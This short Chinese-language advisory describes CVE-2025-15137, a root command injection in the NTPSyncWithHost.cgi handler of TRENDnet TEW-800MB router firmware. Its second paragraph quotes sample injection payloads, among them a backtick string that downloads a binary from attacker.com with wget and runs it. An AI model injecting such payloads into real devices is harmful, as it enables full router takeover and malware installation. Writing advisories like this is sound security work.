CVE-2025-15137CVE-2025-15137是影响TRENDnet TEW-800MB 1.0.1.0版本路由器固件的一个高危命令注入漏洞。该漏洞存在于Web管理界面的NTPSyncWithHost.cgi文件中,具体位于sub_F934函数。攻击者可以通过构造恶意输入参数,在受影响的设备上以root权限执行任意系统命令。由于该漏洞无需认证即可利用(低权限认证要求),且可通过网络远程发起攻击,因此具有极高的安全风险。攻击者成功利用此漏洞可完全控制受影响的路由器设备,执行恶意代码、窃取敏感信息或将其纳入僵尸网络用于进一步攻击。值得注意的是,TRENDnet厂商在收到漏洞通知后未做出任何回应,导致该漏洞长期未修复。目前相关漏洞利用代码已公开,进一步增加了该漏洞被恶意利用的风险。
该命令注入漏洞位于TRENDnet TEW-800MB路由器的NTPSyncWithHost.cgi脚本中的sub_F934函数。攻击者通过向NTPSyncWithHost.cgi页面提交精心构造的参数,利用函数中对用户输入缺乏有效过滤和转义的缺陷,将恶意系统命令注入到底层system()或popen()等函数调用中执行。由于路由器固件以root权限运行Web服务,注入的命令将以最高权限执行。攻击者通常利用分号、反引号、管道符等shell元字符绕过输入限制,例如在NTP服务器参数中插入';whoami #'或'`wget http://attacker.com/malware -O /tmp/m && chmod +x /tmp/m && /tmp/m&'等payload。成功利用后,攻击者可获得设备的完全控制权,执行任意命令、安装后门或修改系统配置。CVSS 3.1评分8.8(高危)反映了该漏洞的高影响性和可利用性。